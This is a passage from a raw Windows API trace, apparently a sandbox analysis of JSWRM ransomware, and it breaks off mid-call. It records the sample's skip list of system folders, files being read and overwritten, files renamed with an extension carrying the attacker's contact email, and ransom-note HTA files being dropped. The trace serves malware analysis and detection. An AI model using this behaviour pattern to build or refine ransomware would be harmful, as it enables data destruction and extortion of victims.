cFileName="PowerViewRes.ar.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2=".") returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="..") returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="...") returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="windows") returned -1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="recovery") returned -1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="perflogs") returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="documents and settings") returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="system volume information") returned -1 [0123.622] lstrcmpiW (lpString1="PowerViewRes.ar.xap", lpString2="msocache") returned 1 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ar.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ar.xap", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ar.xap", lpUsedDefaultChar=0x0) returned 19 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ar.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0123.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ar.xap", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ar.xap", lpUsedDefaultChar=0x0) returned 19 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0123.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\PowerViewRes.ar.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\powerviewres.ar.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.624] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=331489) returned 1 [0123.624] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.624] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.638] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.638] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.638] CloseHandle (hObject=0x338) returned 1 [0123.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0123.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0123.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0123.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.639] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\PowerViewRes.ar.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\powerviewres.ar.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\PowerViewRes.ar.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\powerviewres.ar.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0123.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0123.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.640] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133cde53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50ee1, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="PowerViewRes.ar.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.640] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0123.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0123.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0123.641] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0123.641] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0123.641] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0123.641] lstrcmpiW (lpString1="bg", lpString2="...") returned 1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="windows") returned -1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="recovery") returned -1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="perflogs") returned -1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="documents and settings") returned -1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="$RECYCLE.BIN") returned 1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="system volume information") returned -1 [0123.642] lstrcmpiW (lpString1="bg", lpString2="msocache") returned -1 [0123.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0123.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0123.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0123.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0123.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0123.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0123.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\jswrm-decrypt.hta")) returned 0xffffffff [0123.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0123.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0123.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0123.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0123.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.644] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.645] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.645] CloseHandle (hObject=0x314) returned 1 [0123.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0123.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0123.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0123.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0123.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0123.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0123.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0123.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0123.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\jswrm-decrypt.hta")) returned 0x20 [0123.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0123.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0123.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0123.646] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x405c3e7b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0123.646] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.646] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x405c3e7b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="..", cAlternateFileName="")) returned 1 [0123.646] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.646] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.646] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12dd5ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4e40, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.646] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.647] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241128, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0123.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0123.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.647] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x405c3e7b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x405c3e7b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x405c3e7b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.647] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.648] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdc8437, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdc8437, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x18040, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, 